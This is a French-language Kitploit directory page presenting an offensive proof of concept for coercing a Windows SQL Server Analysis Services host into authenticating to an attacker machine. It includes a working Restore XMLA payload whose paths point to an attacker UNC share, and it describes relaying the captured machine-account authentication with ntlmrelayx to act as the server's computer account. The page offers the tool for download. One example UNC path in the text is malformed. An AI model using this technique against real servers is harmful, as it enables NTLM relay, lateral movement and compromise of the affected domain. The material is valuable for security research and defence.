Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
MSSQL-Analysis-Coerce — Une technique pour contraindre un serveur SQL Windows à s'authentifier sur une machine arbitraire. | Kitploit
Outils/GitHubGitHub/p0dalirius/mssql-analysis-coerce
ExploitationMouvement LatéralPost-ExploitationTests d'IntrusionRed TeamingAttaque Adversariale
GitHubp0dalirius/mssql-analysis-coerce

MSSQL-Analysis-Coerce

Une technique pour contraindre un serveur SQL Windows à s'authentifier sur une machine arbitraire.

Voir le dépôt
133135il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

MSSQL Analysis Services - Authentification forcée

Une technique pour forcer un serveur SQL Windows à s'authentifier sur une machine arbitraire.

Cette preuve de concept est co-écrite par :

  • Podalirius: YouTube Channel Subscribers
  • Worty:

Preuve de concept

Afin de déclencher l'authentification en tant que compte de la machine locale, nous devons nous connecter au serveur SQL distant en utilisant des identifiants utilisateur :

Ensuite, nous sélectionnons « Restore » pour restaurer la base de données à partir d'un fichier donné.

Pour générer le fichier XMLA, placez le chemin d'un fichier quelconque dans le champ « Backup File », puis cliquez sur OK.

Ensuite, modifiez le chemin vers un fichier quelconque et remplacez-le par un chemin UNC vers votre serveur attaquant (par exemple \\192.168.128\SYSVOL\db.abf)

Requête XMLA de preuve de concept (poc.xmla) :

root@kitploit:~
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
    <File>\\192.168.2.51\SYSVOL\db.abf</File>
    <DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
    <DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>

Et nous obtenons une authentification depuis le compte de la machine locale du serveur SQL :

Relayer pour gagner

Une fois l'authentification obtenue, nous pouvons la relayer avec ntlmrelayx pour effectuer de nombreuses actions au nom de l'ordinateur SQL01$.

C'est intéressant, mais il est compliqué de déclencher cette authentification forcée depuis une machine d'attaque Linux, car nous n'avons pas accès à SQL Server Management Studio (SSMS).

Références

  • https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
  • https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
  • https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html
Télécharger l’outil